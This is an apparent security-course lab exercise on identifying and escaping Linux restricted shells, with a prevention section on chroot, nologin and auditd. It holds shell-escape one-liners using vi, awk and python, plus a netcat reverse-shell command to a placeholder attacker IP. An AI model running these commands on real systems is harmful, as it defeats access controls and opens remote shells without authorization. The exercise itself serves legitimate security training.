Exercise 9: Bypassing Restricted Shells

Objective: Learn how to bypass restricted shell environments (such as rbash) that limit user capabilities, and understand how to implement effective restrictions to prevent such exploits.

Scenario: You gain access to a Linux system, but your account is confined to a restricted shell (e.g., rbash). Restricted shells are designed to limit user actions, but with some creative techniques, these restrictions can often be bypassed. Your task is to identify the restricted shell, bypass it, and implement secure configurations to prevent such exploits.

Lab Setup

1. Environment:
   • A Linux system with a user account configured to use a restricted shell.
2. Tools Required:
   • Terminal access to the Linux system.
   • Familiarity with basic shell commands and scripting.

Lab Steps

Step 1: Identify a Restricted Shell

Check the shell assigned to your user account by inspecting the /etc/passwd file:

cat /etc/passwd | grep $(whoami)

Example output:

testuser:x:1001:1001::/home/testuser:/bin/rbash

The shell path (e.g., /bin/rbash) indicates a restricted shell.

Attempt basic commands to confirm restrictions:

cd / echo $PATH

Restricted shells often block navigation (cd) and limit accessible commands.

Step 2: Bypass the Restricted Shell

Modify Environment Variables:

Attempt to change the shell environment:

export SHELL=/bin/bash 
export PATH=/bin:/usr/bin 
/bin/bash

If successful, this will provide a full shell environment.

Invoke System Commands Indirectly:

Use built-in commands to invoke unrestricted shells:

vi

In vi, access a shell by typing:

:!bash

Alternatively, use awk or python to spawn a shell:

awk 'BEGIN {system("/bin/bash")}' 
python -c 'import os; os.system("/bin/bash")'

Use Netcat for a Reverse Shell:

Set up a listener on your attack machine:

nc -lvnp 4444

On the restricted shell, execute:

nc -e /bin/bash <attacker_ip> 4444 

Replace <attacker_ip> with your machine’s IP address.

Step 3: Gain Full Shell Access

If successful, verify your privileges:

whoami

Explore the system to determine the scope of your access.

Solution

Explanation:

• Restricted shells like rbash limit user commands and navigation by controlling the environment and available binaries. However, creative methods such as modifying environment variables, leveraging unrestricted programs, or invoking system commands can bypass these restrictions.

Prevention:

1. Enforce Shell Restrictions:
   • Use tools like chroot or containers for stricter isolation.
2. Restrict Access to Critical Binaries:
   • Limit accessible commands and binaries by managing the PATH environment variable.
3. Disable Interactive Shells for Restricted Users:
   • Replace restricted user shells with non-interactive options like /usr/sbin/nologin.
4. Monitor and Audit User Activity:
   • Use tools like auditd to log user commands and detect suspicious behavior.
5. Apply the Principle of Least Privilege:
   • Ensure restricted users have only the minimal permissions required for their tasks.

Testing and Verification

1. After implementing restrictions, attempt the bypass techniques to ensure they are no longer effective.
2. Review shell and system logs to monitor for suspicious activity.
3. Document findings and configurations for reporting.

Reflection

This exercise demonstrates the limitations of restricted shells and provides practical techniques to bypass and secure them. By completing this lab, you’ve gained hands-on experience in exploiting and mitigating restricted shell environments to enhance system security.